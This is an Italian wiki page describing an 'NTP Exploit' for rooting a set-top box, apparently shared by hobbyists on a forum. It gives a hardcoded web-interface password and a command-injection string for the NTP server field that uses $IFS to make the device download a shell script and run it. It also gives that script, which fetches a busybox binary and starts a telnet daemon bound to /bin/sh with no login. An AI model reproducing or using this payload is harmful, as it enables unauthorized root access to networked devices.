====== NTP Exploit ======
  * Impostare sul PC l'indirizzo IP 83.221.117.229
  * Eseguire un server DHCP impostato per rilasciare indirizzi da 83.221.117.200 a 83.221.117.220
  * Disattivare eventuali altri server DHCP
  * Accendere il STB e attendere la fine del boot
  * Aprire un browser alla pagina http://83.221.117.200:1980 (o qualunque altro indirizzo abbia preso il STB)
  * Entrare con password //t30d0r1c0//
  * Impostare nel campo relativo al server NTP la seguente stringa:

  pool.ntp.org;$(cd$IFS/tmp;/usr/bin/wget$IFS\http://83.221.117.229/script.sh;/bin/sh$IFS/tmp/script.sh)

  * Attivare un server HTTP sul proprio PC
  * Preparare un file script.sh fatto così:

  mount -t tmpfs -osize=2m tmpfs /mnt
  
  cd /mnt
  /usr/bin/wget http://83.221.117.229/telnetd
  /bin/chmod 0777 /mnt/telnetd
  /mnt/telnetd -l /bin/sh

  * Copiare il file script.sh nella root directory del server web
  * Prelevare busybox26 dal [[http://www.lundman.net/wiki/index.php/NMT:telnetd|sito di lundman]], rinominare il file busybox26 in telnetd e copiarlo nella root directory del server web
  * Accendere il STB e attendere la fine del boot
  * Utilizzare un client telnet per connettersi
//Credits: Cyberstorm, Roleo su [[http://www.ilpuntotecnicoeadsl.com/forum/index.php/topic,3267.msg70733.html#msg70733| Ilpuntotecnicoeadsl Forum]]//